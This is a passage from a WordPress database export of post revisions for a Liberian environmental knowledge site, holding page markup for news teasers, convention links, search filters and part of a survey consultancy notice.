href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/libassa.png\" alt=\"EPA Technicians Carry Out Inventory on Animal Welfare at Libassa Wildlife Sanctuary in Marshall, Margibi County\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\">EPA Technicians Carry Out Inventory on Animal Welfare at Libassa...</a></h4>Technicians from the EPA headed by Hawa Walker, assistant manager&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2021-08-18 14:43:20','2021-08-18 14:43:20','',9,'https://ekmsliberia.info/?p=4079',0,'revision','',0),(4080,38,'2021-08-18 14:43:21','2021-08-18 14:43:21','Convention on Biological Diversity CBD is dedicated to promoting sustainable development<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\">Read More</a>Convention on Climate ChangeThe ultimate objective of the Convention is to stabilize greenhouse gas concentrations \"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\"<a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\">Read More</a>Convention to Combat DesertificationA sole legally binding international agreement linking environment and development to sustainable land management.<a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\">Read More</a>				\n							Previous\n							Next\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\" target=\"\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"225\">Presentations</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n			<button>See all results</button>			\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fas fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/kehkeh.png\" alt=\"Liberia’s Grassroots Solar Energy Innovator\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/blog/\">Blog</a><h4><a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\">Liberia’s Grassroots Solar Energy Innovator</a></h4>Across the world, innovators from different sectors have invented devices,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/Untitled.png\" alt=\"NaFAA Fines Illegal Ivorian Fisherman US$5,000.00\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\">NaFAA Fines Illegal Ivorian Fisherman US$5,000.00</a></h4>To deter illegal, unreported and unregulated (IUU) fishing across Liberia,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/nafaa.png\" alt=\"NaFAA Along With National Coast Guard Rescue Fishermen Lost at Sea\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\">NaFAA Along With National Coast Guard Rescue Fishermen Lost at...</a></h4>National Fisheries and Aquaculture Authority(NaFAA) in collaboration with the Liberia&hellip;\n	<a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/libassa.png\" alt=\"EPA Technicians Carry Out Inventory on Animal Welfare at Libassa Wildlife Sanctuary in Marshall, Margibi County\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\">EPA Technicians Carry Out Inventory on Animal Welfare at Libassa...</a></h4>Technicians from the EPA headed by Hawa Walker, assistant manager&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2021-08-18 14:43:21','2021-08-18 14:43:21','',9,'https://ekmsliberia.info/?p=4080',0,'revision','',0),(4081,38,'2021-08-18 14:48:00','2021-08-18 14:48:00','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search Filter\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-18 14:48:00','2021-08-18 14:48:00','',91,'https://ekmsliberia.info/?p=4081',0,'revision','',0),(4082,38,'2021-08-18 14:48:00','2021-08-18 14:48:00','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search Filter\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-18 14:48:00','2021-08-18 14:48:00','',91,'https://ekmsliberia.info/?p=4082',0,'revision','',0),(4083,38,'2021-08-18 14:48:00','2021-08-18 14:48:00','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-18 14:48:00','2021-08-18 14:48:00','',91,'https://ekmsliberia.info/?p=4083',0,'revision','',0),(4084,38,'2021-08-18 14:50:11','2021-08-18 14:50:11','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-18 14:50:11','2021-08-18 14:50:11','',91,'https://ekmsliberia.info/?p=4084',0,'revision','',0),(4085,38,'2021-08-18 14:50:11','2021-08-18 14:50:11','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-18 14:50:11','2021-08-18 14:50:11','',91,'https://ekmsliberia.info/?p=4085',0,'revision','',0),(4086,38,'2021-08-18 14:50:11','2021-08-18 14:50:11','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n			Search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search...\"\n		>\n			Filter by Category\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"76\"\n			data-label=\"Case Studies\"\n					>\n						Case Studies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"78\"\n			data-label=\"Conventions\"\n					>\n						Conventions\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"79\"\n			data-label=\"Factsheets\"\n					>\n						Factsheets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"161\"\n			data-label=\"Guidelines\"\n					>\n						Guidelines\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"82\"\n			data-label=\"Leaflets\"\n					>\n						Leaflets\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"84\"\n			data-label=\"Newsletters\"\n					>\n						Newsletters\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"85\"\n			data-label=\"Policies\"\n					>\n						Policies\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"225\"\n			data-label=\"Presentations\"\n					>\n						Presentations\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"209\"\n			data-label=\"Project Document\"\n					>\n						Project Document\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"86\"\n			data-label=\"Reports\"\n					>\n						Reports\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"178\"\n			data-label=\"Research\"\n					>\n						Research\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"88\"\n			data-label=\"Strategy and Action Plans\"\n					>\n						Strategy and Action Plans\n	</label>\n	<label>\n		<input\n			type=\"checkbox\"\n			class=\"jet-checkboxes-list__input\"\n			name=\"resource_category\"\n			value=\"89\"\n			data-label=\"Toolkits\"\n					>\n						Toolkits\n	</label>','Document Library','','inherit','closed','closed','','91-revision-v1','','','2021-08-18 14:50:11','2021-08-18 14:50:11','',91,'https://ekmsliberia.info/?p=4086',0,'revision','',0),(4088,38,'2021-08-18 15:26:36','2021-08-18 15:26:36','','Topic-MEA-single-post','','publish','closed','closed','','topic-mea-single-post','','','2021-08-18 15:41:12','2021-08-18 15:41:12','',0,'https://ekmsliberia.info/?post_type=elementor_library&#038;p=4088',0,'elementor_library','',0),(4091,43,'2021-08-18 15:37:35','2021-08-18 15:37:35','','Topic-MEA-single-post','','inherit','closed','closed','','4088-revision-v1','','','2021-08-18 15:37:35','2021-08-18 15:37:35','',4088,'https://ekmsliberia.info/?p=4091',0,'revision','',0),(4092,43,'2021-08-18 15:37:36','2021-08-18 15:37:36','','Topic-MEA-single-post','','inherit','closed','closed','','4088-revision-v1','','','2021-08-18 15:37:36','2021-08-18 15:37:36','',4088,'https://ekmsliberia.info/?p=4092',0,'revision','',0),(4093,43,'2021-08-18 15:40:45','2021-08-18 15:40:45','','Topic-MEA-single-post','','inherit','closed','closed','','4088-revision-v1','','','2021-08-18 15:40:45','2021-08-18 15:40:45','',4088,'https://ekmsliberia.info/?p=4093',0,'revision','',0),(4094,43,'2021-08-18 15:41:12','2021-08-18 15:41:12','','Topic-MEA-single-post','','inherit','closed','closed','','4088-revision-v1','','','2021-08-18 15:41:12','2021-08-18 15:41:12','',4088,'https://ekmsliberia.info/?p=4094',0,'revision','',0),(4096,43,'2021-08-18 16:31:45','2021-08-18 16:31:45','','Bulletins-loop','','publish','closed','closed','','bulletins-loop','','','2021-08-18 16:44:50','2021-08-18 16:44:50','',0,'https://ekmsliberia.info/?post_type=elementor_library&#038;p=4096',0,'elementor_library','',0),(4097,43,'2021-08-18 15:58:06','2021-08-18 15:58:06','','Bulletins-loop','','inherit','closed','closed','','4096-revision-v1','','','2021-08-18 15:58:06','2021-08-18 15:58:06','',4096,'https://ekmsliberia.info/?p=4097',0,'revision','',0),(4098,43,'2021-08-18 16:02:15','2021-08-18 16:02:15','','Owner','','publish','closed','closed','','owner','','','2021-08-18 17:55:06','2021-08-18 17:55:06','',2483,'https://ekmsliberia.info/?post_type=_pods_field&#038;p=4098',1,'_pods_field','',0),(4099,43,'2021-08-18 16:02:16','2021-08-18 16:02:16','','Closed Date','','publish','closed','closed','','closed_date','','','2021-08-18 17:55:06','2021-08-18 17:55:06','',2483,'https://ekmsliberia.info/?post_type=_pods_field&#038;p=4099',0,'_pods_field','',0),(4103,43,'2021-08-18 17:10:40','2021-08-18 17:10:40','The consultancy aims to examine the awareness level among individuals to gather additional inputs on national priorities and constraints for improved and sustained environmental governance, to evaluate the weaknesses and strengths of the current environmental awareness, and to suggests a plan that is likely to raise the level of environmental awareness in the full contexts of climate change, biological conservation and land degradation. A review of previous related surveys is also required. Due to the importance of the environment in Liberia, and its connotations to socioeconomic development in general, and rural livelihoods in particular, this survey should contribute towards enhancing the national framework related to enhancing of biodiversity, climate change and land degradation awareness among individuals. The survey should utilize primary data collected through structured survey questionnaires. A random sample of professionals in institutions to test their awareness in the fields of climate change, biological conservation and land degradation.','Request for Expression of Interest: Individual Interviews to gather additional inputs onUTS ON NATIONAL PRIORITIES AND CONSTRAINTS','','inherit','closed','closed','','3791-autosave-v1','','','2021-08-18 17:10:40','2021-08-18 17:10:40','',3791,'https://ekmsliberia.info/?p=4103',0,'revision','',0),(4104,43,'2021-08-18 16:11:29','2021-08-18 16:11:29','The consultancy aims to examine the awareness level among individuals to gather additional inputs on national priorities and constraints for improved and sustained environmental governance, to evaluate the weaknesses and strengths of the current environmental awareness, and to suggests a plan that is likely to raise the level of environmental awareness in the full contexts of climate change, biological conservation and land degradation. A review of previous related surveys is also required. Due to the importance of the environment in Liberia, and its connotations to socioeconomic development in general, and rural livelihoods in particular, this survey should contribute towards enhancing the national framework related to enhancing of biodiversity, climate change and land degradation awareness among 